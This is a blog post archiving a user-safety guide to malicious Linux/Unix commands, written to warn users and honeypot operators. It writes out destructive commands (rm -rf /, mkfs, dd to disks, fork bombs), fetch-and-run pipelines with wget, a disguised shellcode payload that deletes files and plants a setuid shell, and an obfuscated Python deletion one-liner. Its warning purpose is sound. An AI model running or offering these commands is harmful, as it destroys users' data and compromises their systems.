Guide to Malicious Linux/Unix Commands

UbuntuGuide.org has an excellent guide to Malicious Linux/Unix Commands which may be observed on live systems or honeypots.

Not only is it a good idea to monitor logs for attempts at using these commands, but it may also be a good idea to test your honeypot (especially if it's a virtual machine) to see if these commands will damage/destroy your honeypot.

Below is a current copy of the guide.  It has already dissapeared from the Ubuntu forums, so I felt it would be a good idea to archive "just in case".



This article was originally published in Ubuntu Forums but has recently been removed there. Ubuntuguide feels that knowledge about these risks is more important than any misguided attempts to "protect the public" by hiding their potential dangers or protect the (K)Ubuntu/Linux image. The original article has therefore been re-created (and subsequently edited) here.)
ATTENTION:
It is worthwhile to have some basic awareness about malicious commands in Linux. Always be cautious when running one of these (or similar) commands (or downloaded scripts) that have been "recommended" as a solution to a problem you may have with your computer.

It is also worthwhile to always enable a screensaver with a password so that a casual passerby is not able to maliciously execute one of these commands from your keyboard while you are away from your computer.
When in doubt as to the safety of a recommended procedure or command, it is best to verify the command's function from several sources, such as from readily available documentation on Linux commands (e.g. manpages).
Here are some common examples of dangerous commands that should raise a red flag. Again, these are extremely dangerous and should not be attempted on any computer that has any physical connection to valuable data. Many of the commands and techniques will cause just as much damage from a LiveCD environment, as well.
This is far from an exhaustive list, but should give some clues as to what kind of things people may try to trick you into doing. Remember these can always be disguised as some obfuscated command or as a part of a long procedure, so the bottom line is to take appropriate caution when executing something that just doesn't "feel right".

Delete all files, delete current directory, or delete visible files in current directory

It's quite obvious why these commands can be dangerous to execute. rm means remove, -f means "force" deletion (even if write protected), and -r means do it recursively, i.e. all subfolders. Therefore, " rm -rf / " means force a deletion of everything in the root directory and all subfolders. " rm -rf . " means to force deletion of the current directory and all subfolders. " rm -rf * " means to force deletion of all files in the current folder and all subfolders.
rm -rf /
rm -rf .
rm -rf *
Another variation of this, which would all force deletion of the current folder and all subfolders, would be:
rm -r .[^.]* 
which will only exclude the parent directory ".."

Reformat Data on device

Whatever follows the mkfs command will be destroyed and replaced with a blank filesystem.
mkfs
mkfs.ext3
mkfs.anything

Block device manipulation

These commands cause raw data to be written to a block device. Often this will clobber the filesystem and cause total loss of data:
any_command > /dev/sda
dd if=something of=/dev/sda

Forkbomb

Although perhaps intriguing and curiosity-provoking, these commands execute a huge number of processes until the system freezes, forcing a hard reset of the computer (which may cause data corruption, operating system damage, or other awful fate).
  • In Bourne-ish shells (like Bash):
:(){:|:&};:
  • In Perl
fork while fork

Tarbomb

Someone asks you to extract a tar archive into an existing directory. This tar archive can be crafted to explode into a million files, or can inject files into the system by guessing filenames. You should always decompress tar archives to a clean directory with nothing else in it. Only after determining that the extracted files are what was expected should the extracted files be copied to the final target directory.

Decompression bombs

Someone asks you to extract an archive which appears to be a small download. In reality it's highly compressed data and will inflate to hundreds of GB's, filling your hard drive. You should never download and extract any data, utility, or software from an untrusted source.

Malicious code in Shell scripts

Someone gives you the link to a shell script (executable from the command line interface using script execution command ./ ) and recommends that you download and execute it. The script might contains any command whatsoever -- whether benign or malevolent. Never execute code from people you don't trust. Examples:
wget http://some_place/some_file
sh ./some_file
or
wget http://some_place/some_file -O- | sh

Malicious source code to be compiled then executed

Someone gives you source code then tells you to compile it. It is easy to hide malicious code as a part of a large wad of source code, and source code gives the attacker a lot more creativity for disguising malicious payloads. Do not compile or execute the resulting compiled code unless the source is some well-known application obtained from a reputable site (i.e. SourceForge, the author's homepage, an Ubuntu address).
A famous example of this was code that surfaced on a mailing list. It was disguised as a proof of concept "sudo exploit". It was claimed that if you ran the code, sudo would grants root privileges without a shell (which is what the commands gksudo and kdesudo are for). In the downloaded code was this malicious payload:
char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
               = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                 "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                 "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                 "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                 "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                 "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                 "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                 "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";
To the new or even somewhat experienced computer user, this looks like the "hex code gibberish stuff" that is so typical of a safe proof-of-concept. However, this actually runs
rm -rf ~ / &
which will destroy your home directory as a regular user, or all files if you are logged in as root. If you were able to recognize commands in hex string format, you would already be such an expert user that you would never run such untrusted code. But for the rest of us, we must remember that malicious code comes in many novel forms -- be wary about installing code that you know nothing about and the source of which you don't absolutely trust.
Here is another monstrous example (in Python) that no self-respecting programmer or user would ever execute:
python -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
in which "sn!.sg!+" is simply the rm -rf * command shifted a character up in order to disguise it from casual examination. I wouldn't expect anyone with experience in Python to be foolish enough to paste this monstrous thing into their terminal without suspecting something might be wrong, but how many casual users are fluent in Python?

No comments:

Post a Comment